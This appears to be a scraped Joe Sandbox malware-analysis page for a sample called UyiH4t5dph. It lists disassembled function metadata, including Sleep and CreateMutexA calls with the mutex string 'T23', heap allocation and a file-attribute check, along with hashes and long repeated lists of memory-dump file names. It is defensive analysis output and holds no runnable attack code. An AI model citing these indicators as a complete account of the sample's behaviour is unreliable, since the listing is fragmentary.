Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T23
API String ID: 1464230837-3327420953
Opcode ID: 6d9ff38a59f32e729a13a49b6e0b3126ec9c8026725676f2161ae4d4448bba7d
Instruction ID: b5d165345c959cf651bb53fd7416fbfe83d3b241e2e63e584bb48603d9a5d1a1
Opcode Fuzzy Hash: 6d9ff38a59f32e729a13a49b6e0b3126ec9c8026725676f2161ae4d4448bba7d
Instruction Fuzzy Hash: E03128317642409BEB08DB78DC99FADF766EF85310F24861AE018DB3E5C7758DA08762

Function 002D9ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 002DA963
CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981

Strings

T23, xrefs: 002DA970

Memory Dump Source

Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T23
API String ID: 1464230837-3327420953
Opcode ID: bcea1b5afcae5d4f016ebd2bfc113ab0f21f9f1ba6abc098f4739cc88382fc43
Instruction ID: bf0246f4e0aff5088164080ba421d1fd284df24d62d8ab8372d9b173af9710c1
Opcode Fuzzy Hash: bcea1b5afcae5d4f016ebd2bfc113ab0f21f9f1ba6abc098f4739cc88382fc43
Instruction Fuzzy Hash: B1216A317642409BEB189F69ECC9BADF325EBC1310F20461BF418C73E0C7B58DA08611

Function 002DA856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 002DA963
CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981

Strings

T23, xrefs: 002DA970

Memory Dump Source

Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T23
API String ID: 1464230837-3327420953
Opcode ID: 01cb12db81c7907411a5f1720248a7a15bde65ecd307227031468eb48eef251c
Instruction ID: 78df9ae8ea63a880df535770dfc93852fa4a758cb38070963d83e1bb7e5df8db
Opcode Fuzzy Hash: 01cb12db81c7907411a5f1720248a7a15bde65ecd307227031468eb48eef251c
Instruction Fuzzy Hash: C6214F313791019BF7256B69D89FF7EB212DF81300F244917E848D63D1DBBA4DA09553

Function 002DA34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 002DA963
CreateMutexA.KERNEL32(00000000,00000000,00333254), ref: 002DA981

Strings

T23, xrefs: 002DA970

Memory Dump Source

Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T23
API String ID: 1464230837-3327420953
Opcode ID: 5fe6ad88e1f4c52a4e702360f096a0bb38901b22e4f7c2081d9593ccf6f6fc02
Instruction ID: 43a50d3ae0cbde7fb6a71c6782503fb73cd9af3c31d4cb3f69b145ee8ff2c3b0
Opcode Fuzzy Hash: 5fe6ad88e1f4c52a4e702360f096a0bb38901b22e4f7c2081d9593ccf6f6fc02
Instruction Fuzzy Hash: B9217C313642009BEB18AF29EC8ABADF726DFD5310F24461EE418D77E0C7755DA08752

Function 0030B04B Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00315024,?,00000000,?,0030EE3F,?,00000004,00000000,?,?,?,00309714), ref: 0030B07D

Memory Dump Source

Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466526095.0000000000546000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466560000.0000000000547000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466652427.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466668941.0000000000556000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466743514.0000000000557000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466802032.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.0000000000562000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466829157.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466970424.00000000005CC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467010231.00000000005CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467081116.00000000005CE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467102225.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467155428.00000000005D6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467186116.00000000005E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467265783.00000000005E3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467308667.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1467331767.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_UyiH4t5dph.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7b27a678a3ebaf62599a0abf18132bbad7473f84c61419c2be481fb3a10cb708
Instruction ID: cc6b1b5e4ae6a771bff0a65f35e9439443d0a72e9a031ed04fa3cfde5e6be61b
Opcode Fuzzy Hash: 7b27a678a3ebaf62599a0abf18132bbad7473f84c61419c2be481fb3a10cb708
Instruction Fuzzy Hash: F6E09B35587215A7D73333759C61B6FF64C9F423B0F171211EDA4A65D1DB11DC0081E1

Function 002D87B2 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,002DDA1D,?,?,?,?), ref: 002D87B9

Memory Dump Source

Source File: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1464656048.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464681693.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464800236.0000000000339000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464865315.000000000033B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1464886470.0000000000347000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465105384.00000000004A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465169337.00000000004A3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465206560.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465326334.00000000004B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465456215.00000000004CB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465489162.00000000004CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465514994.00000000004D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465566647.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465587541.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465649423.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465681666.00000000004F2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465812022.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465841886.00000000004FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1465934999.0000000000509000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466061014.000000000051B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466117563.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466217899.000000000051E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466328011.0000000000524000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466360577.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466397140.0000000000537000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1466508084.0000000000545000.00000080.00000001.01000000.00000003.sdmpDownload File
